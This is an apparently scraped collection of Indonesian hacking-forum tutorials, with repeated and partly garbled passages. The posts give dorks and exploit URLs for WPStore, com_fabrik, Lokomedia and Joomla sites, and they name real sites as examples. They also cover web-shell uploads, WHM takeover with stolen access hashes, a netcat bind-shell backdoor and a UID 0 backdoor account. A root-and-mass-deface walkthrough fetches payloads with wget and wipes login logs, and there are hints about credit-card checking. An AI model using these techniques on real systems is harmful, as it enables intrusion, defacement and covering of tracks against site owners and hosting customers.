Hack Web With WPStore
Hack Web With WPStore
oke ane newbie mau share tutor cupu
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
example :
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
Quote:/wp-content/themes/framework/upload
example :
Quote:http://yourweddingdress.co.za/wp-content...rk/upload/
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
Quote:username : root
password : toor
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
Quote:/wp-content/uploads/products_img/[nama shell anda].php
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
deface dengan com_fabrik .
Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Membuat Backdor di linux
1) siapkan 2 buah laptop sebagai percobaannya
2)Pada kedua komputer tersebut lakukan instalasi paket netcat
Code:
apt-get install netcat
3) Pada komputer target (server) buat backdoor dengan netcat
Code:
nc –l –p 5050 –e /bin/bash
catatan :-l : listen, siap menerima koneksi-p : pada port berapa koneksi diterima-e : jalankan perintah terminal yaitu /bin/bashSetelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam keadaan terbuka di sisi server.
Code:
# nmap localhost
4)Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat account pada komputer server
Code:
# nc 192.168.50.10 5050debianGUI:~# nc 10.252.42.132 5050adduser datahack => buat user datahack disisi serverAdding user `datahack' ...Adding new group `datahack' (1002) ...Adding new user `datahack' (1002) with group `datahack' ...Creating home directory `/home/datahack' ...Copying files from `/etc/skel' ...datahack => buat password : datahackdatahack => retype passwordChanging the user information for datahackEnter the new value, or press ENTER for the defaultFull Name []:Room Number []:Work Phone []:Home Phone []:Other []:yIs the information correct? [Y/n] y^C
5) Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi server, sehingga anda sudah berhasil masuk ke sisi server.
Code:
# telnet 192.168.50.10
Download RAR Password Unlocker 4.2.0 Full Crack
Kesempatan kali ini kita akan membahas tentang cara membuka file WinRar yang telah di password. Mungkin artikel ini bermanfaat bagi para netter yang mengalami permasalahan untuk mengekstrak file yang di kompres dengan Winrar, yaitu lupa password untuk membuka berkas filenya.
Untuk melakukan hal tersebut dibutuhkan sebuah Tools bantu yaitu, "WinRar.PW.Remover-hs"
Berikut cara untuk membuka File WinRar yang telah di Password :
1. Instal Aplikasi tersebut ke dalam sistem komputer anda.
2. Jalankan Aplikasi dimaksud.
3. Klik tombol Open "RAR File"
4. Pilih Metode untuk membuka Password File Rar-nya, misalnya : "Brute-Force Attack"
5. Klik tombol Start, tunggu sejenak hingga muncul PopUp hasilnya.
Untuk mendapatkan tools-nya silahkan Download di sini
note: tanda * / %2A di link diatas dihilangkan buat bisa ngedownload gan
semoga bermanfaat gan
Untuk melakukan hal tersebut dibutuhkan sebuah Tools bantu yaitu, "WinRar.PW.Remover-hs"
Berikut cara untuk membuka File WinRar yang telah di Password :
1. Instal Aplikasi tersebut ke dalam sistem komputer anda.
2. Jalankan Aplikasi dimaksud.
3. Klik tombol Open "RAR File"
4. Pilih Metode untuk membuka Password File Rar-nya, misalnya : "Brute-Force Attack"
5. Klik tombol Start, tunggu sejenak hingga muncul PopUp hasilnya.
Untuk mendapatkan tools-nya silahkan Download di sini
note: tanda * / %2A di link diatas dihilangkan buat bisa ngedownload gan
semoga bermanfaat gan
Hack Web Host Manager (WHM)
Assalammualaikum…
Hallo
sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo
hacking2an.. hehehe :D oke sekarang saya mo bahas mengenai cara Hack Web Host Manager
(WHM) :p
Apa
itu Web Host Manager (WHM) ? >>>> Google aja yah :p
Sebelum
itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol
:D Nah,
Kalo hack WHM, disini kita butuh Config WHMCSnya :3 ga
semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa
juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri
yah :p utk config killernya bisa
gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita
sebelumnya Cara mencari config dalam website
Perhatian!
Tutorial ini dibuat sebagai pengetahuan
dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini
seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak
bertanggung jawab! Use at your own risk!
Pesan Onix AQua:
Gunakan ilmu dengan sebaik2nya,
karena 1 kebaikan yg kalian buat, maka 1000 kebaikan yang akan kalian
dapatkan. dan juga sebaliknya, jika 1 keburukan yang kalian lakukan,
maka 1000 keburukan akan selalu kalian dapatkan selama hidup!
Berikut
bahan2 yg sobat butuhkan:
- Web Shelled
- Whmcs killer
- Config whmcs
Disini saya udah nemu config WHMnya :
isi dalamnya seperti :
Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!
Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p
Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account
Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087
cth: 176.32.342.223:2086
udah pada bisa kan? kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:
Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini
kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.
Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!
kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:
Header Name : Authorization
Header Value : WHM username:AccessHash
Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start
Setelah itu tinggal sobat buka WHMnya.. IP:Port
Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah, maaf kalo masih semerawut :D
CREDIT : ONYQ AQUA
JAVA HOW TO SEND HTTP POST/GET REQUEST
Halo,lama ga temu ama akuh
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST
biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what
i mean ]
semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.
aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi
"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"
kita bikin di localhost dengan nama test.php
oke udah jelaskan,berarti link itu mengambil variable nama,berarti kita mengirim variable nama menggunakan java
pastikan library HttpClient di project java kamu.
ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)
nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST
biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what
i mean ]
semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.
aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi
"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"
kita bikin di localhost dengan nama test.php
PHP Code:
<?php
$nama = $_POST['nama']; // mengambil variable nama yang di kirim melalui http postif ($nama =="")
{
echo "Hallo " .$nama;
}
else
{
echo "client tidak mengirim variable nama";
}?>
pastikan library HttpClient di project java kamu.
ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
Code:
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package hn_httprequest;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.Consts;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
/**
*
* @author xb
*/
public class Main {
/**
* @param args the command line arguments
*/
public static void main(String[] args) {
try {
//ini alamat host/file yang kita minta/buka
String link = "http://localhost/test.php";
//deklarasikan http clientnya
DefaultHttpClient httpclient = new DefaultHttpClient();
//deklarasikan http responsennya
HttpResponse response;
//deklarasikan http postnya,ini untuk handle pengiriman requestnya
HttpPost httpost = new HttpPost(link);
//bikin array untuk tempat pengisian data yang mau di kirim
List<NameValuePair> data_post = new ArrayList<NameValuePair>();
//lalu masukan value post yang mau di kirim,pada kalo ini kita masukin variable nama dengan value dika_xb
data_post.add(new BasicNameValuePair("nama", "DIKA_XB"));
//masukan array yang berisi data yang mau di kirim ke httpost
httpost.setEntity(new UrlEncodedFormEntity(data_post, Consts.UTF_8));
//kirimkan data,lalu ambil respon dari server dengan httpresponse
response = httpclient.execute(httpost);
//ini deklarasi untuk mendapatin elemen elemen data yang udah kita ambil di httpresponse
HttpEntity entity = response.getEntity();
//oke kita coba untuk menampilkan respon server/halamannya
StringBuilder sb = new StringBuilder();
BufferedReader rd = new BufferedReader(new InputStreamReader(response.getEntity().getContent()));
int linex;
while ((linex = rd.read()) != -1) {
sb.append((char) linex);
}
//kita tampilkan status respon server,apakah dia 404 atau yg lain
System.out.println("respon : " + response.getStatusLine());
//kita tampilkan html responsenya
System.out.println(sb.toString());
} catch (Exception e) {
System.out.println("error " + e);
}
}
}
result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)
nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
4 trik Cara Upload Shell di Joomla
kali ini ane mo share bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. (ato mungkin repost)
kali aja ada yg belom tau, kaya newbie seperti ane.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload , lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
Klik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303
mari kita sisipin uploadernya, ane taro dibawah aja.
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template kita td :P
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.
okedeh, sekian tutorial cupu bin jadul. dr ane.
ini buat joomla versi 2.5.x
kali aja ada yg belom tau, kaya newbie seperti ane.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload , lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
Klik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303
mari kita sisipin uploadernya, ane taro dibawah aja.
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template kita td :P
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.
okedeh, sekian tutorial cupu bin jadul. dr ane.
ini buat joomla versi 2.5.x
rooting - manual mass defacing (black Buntu)
Anak baru numpang posting yah,. ok langsung aja yah ga usah pake basa basi,.
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..
setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
tggal jalanin deh local yg sdah kmu upload tadi,.
klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.
tahap akhir'a,. tggal add usermu aja distu,.
klo udah berhasil,. jadi'a kek gini
penjelasan'a,..
sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
klo mau di deface, kita lanjut lagi,. :D
login di putty dan masukan ip server dan port yang mau kita mass deface,..
sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
untuk NamaUser, klian bisa lihat di shell kalian masing2...
sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. :)
log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
cara pke'a :
1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..
2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
dan terakhir kita jalankan remove'a,. :)
trus tggal masukin pilihan'a,.. :)
terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
Tool :
shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable
Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
paling beda'a klo di windows pas mau gunain nc'a doank,.
harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
dah gtu aja,.. moga berguna yah,.. :)
credit : my best teacher Google
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..
setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
tggal jalanin deh local yg sdah kmu upload tadi,.
klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.
tahap akhir'a,. tggal add usermu aja distu,.
klo udah berhasil,. jadi'a kek gini
penjelasan'a,..
PHP Code:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M ftp-user
adduser = comand untuk nambahin user-u 0 -o = set user jadi dngn ID nol (0) root.
-g 0 = set initial group dengan ID nol (0) root.
-G 0,1,2,3,4,6,10 = set additional group ke:0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel-M – ‘home directory’ tidak di create ke user.ftp-user = username dri user yg mau dipke
sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
klo mau di deface, kita lanjut lagi,. :D
login di putty dan masukan ip server dan port yang mau kita mass deface,..
sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
PHP Code:
cd /etc/httpd/conf
setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
PHP Code:
cat httpd.conf | grep -i ServerName > /home/NamaUser/public_html/web.txt
sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
PHP Code:
cat httpd.conf | grep -i DocumentRoot > /home/NamaUser/public_html/user.txt
setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
PHP Code:
cd /root; mkdir bie; cd bie
wget http://blablabla.com/deface.html
ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
PHP Code:
chmod 777 mass.sh; ./mass.sh
yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. :)
log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
cara pke'a :
1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
PHP Code:
find / -name wtmp -printfind / -name utmp -printfind / -name lastlog -printatau
whereis wtmp
whereis utmp
whereis lastlog
Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..
2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
PHP Code:
gcc remove.c -o remove -DGENERIC
remove.c: In function `main':
remove.c:50: warning: return type of `main' is not `int'/tmp/ccZVzySI.o: In function `main':
/tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should
not be used.
PHP Code:
./remove namarootuser
trus tggal masukin pilihan'a,.. :)
terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
Tool :
shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable
Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
paling beda'a klo di windows pas mau gunain nc'a doank,.
harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
dah gtu aja,.. moga berguna yah,.. :)
credit : my best teacher Google
Deface Lokomedia Dengan JS Overlay dan Shell
Tutorial kali ini saya akan membahas tentang deface web dengan JS
Overlay dan Nanem Shell di Web, kalo buat sesepuh mahh udah lewat ajaa
:D
Langsung aja ke tutorial
Dork yang sering saya pakai buat Cari Lokomedia
inurl:/media.php?module=berita
inurl:/admin/foto_berita
inurl:/admin/content.php?module=user
inurl:/adminweb/
1.Search Google Pakai Dork Diatas
2. Kalo ketemu langsung aja ke exploit
http://site/admin/content.php?module=user
3. Kalo Muncul Kaya begini
berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita
4. Langsung aja Klik Pilihan Edit
nanti akan jadi kayak gini
Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..
5. Kalo udah muncul kayak gini, terus di gmana'in ?
Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell
Berikut Tutorialnya
JS Overlay
Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell
terus buat file misalkan devilscream.js
lalu isikan Script berikut
http://newbie-security.or.id/code/js-overlay.txt
Nah, biar Web Lokomedianya ke deface gmana?
Pada CMS Lokomedia masuk ke Menu Berita.
Kalo gak ada pilihan menu berita langsung ke URL
http://site/admin/media.php?module=berita
Kalo kagak bisa yah kagak bisa Dodgy
Lalu klik Add New Berita
Pada Bagian judul masukan Script berikut :
Isi atau lainnya gak usah di isi gak apa-apa
Setelah itu save, percuma kalo gak di save Dodgy
Tanem Shell
Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
kalo gak bisa juga yah emang nasib Dodgy
Atau gak cari Menu yang bisa upload file
Setelah itu Klik AddNews
Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..
Setelah di Upload masukin URL kaya gini
